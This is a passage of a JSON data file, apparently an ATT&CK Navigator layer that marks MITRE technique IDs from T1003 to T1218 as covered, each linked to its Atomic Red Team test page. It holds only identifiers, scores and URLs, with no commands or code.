aster/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/at